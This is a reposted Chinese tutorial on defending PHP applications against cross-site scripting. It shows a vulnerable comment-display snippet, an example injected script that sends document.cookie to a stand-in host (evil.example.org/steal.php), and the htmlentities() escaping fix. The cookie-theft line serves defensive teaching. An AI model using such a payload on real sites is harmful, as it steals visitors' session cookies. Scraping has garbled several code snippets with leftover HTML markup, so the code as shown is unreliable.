PHP安全编程：跨站脚本攻击的防御(转)

跨站脚本攻击是众所周知的攻击方式之一。所有平台上的Web应用都深受其扰，PHP应用也不例外。

所有有输入的应用都面临着风险。Webmail，论坛，留言本，甚至是Blog。事实上，大多数Web应用提供输入是出于更吸引人气的目的，但同时这也会把自己置于危险之中。如果输入没有正确地进行过滤和转义，跨站脚本漏洞就产生了。

以一个允许在每个页面上录入评论的应用为例，它使用了下面的表单帮助用户进行提交：

1 "comment.php" method="POST" />
2   Name: "text" name="name" />
3   Comment: <code class="string">"comment"</code> <code class="plain">rows=</code><code class="string">"10"</code> <code class="plain">cols=</code><code class="string">"60"</code><code class="plain">>
4   "submit" value="Add Comment" />
5

程序向其他访问该页面的用户显示评论。例如，类似下面的代码段可能被用来输出一个评论($comment)及与之对应的发表人（$name）：

1
2
3   echo "$name writes:";
4   echo "$comment";
5
6 ?>

这个流程对$comment及$name的值给予了充分的信任，想象一下它们中的一个的内容中包含如下代码：

1 </code></td> </tr> </tbody> </table> </div> <div class="line alt2"> <table> <tbody> <tr> <td class="number"><code>2</code></td> <td class="content"><code class="spaces">  </code><code class="plain">document.location =</code></td> </tr> </tbody> </table> </div> <div class="line alt1"> <table> <tbody> <tr> <td class="number"><code>3</code></td> <td class="content"><code class="spaces">    </code><code class="string">'http://evil.example.org/steal.php?cookies='</code> <code class="plain">+</code></td> </tr> </tbody> </table> </div> <div class="line alt2"> <table> <tbody> <tr> <td class="number"><code>4</code></td> <td class="content"><code class="spaces">    </code><code class="plain">document.cookie</code></td> </tr> </tbody> </table> </div> <div class="line alt1"> <table> <tbody> <tr> <td class="number"><code>5</code></td> <td class="content"><code class="plain">

如果你的用户察看这个评论时，这与你允许别人在你的网站源程序中加入Javascript代码无异。你的用户会在不知不觉中把他们的cookies(浏览网站的人)发送到evil.example.org，而接收程序(steal.php)可以通过$_GET['cookies']变量防问所有的cookies。

这是一个常见的错误，主要是由于不好的编程习惯引发的。幸运的是此类错误很容易避免。由于这种风险只在你输出了被污染数据时发生，所以只要确保做到如前面所述的过滤输入及转义输出即可。

最起码你要用htmlentities()对任何你要输出到客户端的数据进行转义。该函数可以把所有的特殊字符转换成HTML表示方式。所有会引起浏览器进行特殊处理的字符在进行了转换后，就能确保显示出来的是原来录入的内容。

由此，用下面的代码来显示评论是更安全的：

01
02
03 $clean = array();
04 $html = array();
05
06 /* Filter Input ($name, $comment) */
07
08 $html['name'] = htmlentities($clean['name'], ENT_QUOTES, 'UTF-8');
09 $html['comment'] = htmlentities($clean['comment'], ENT_QUOTES, 'UTF-8');
10
11 echo "{$html['name']} writes:";
12 echo "{$html['comment']}";
13
14 ?>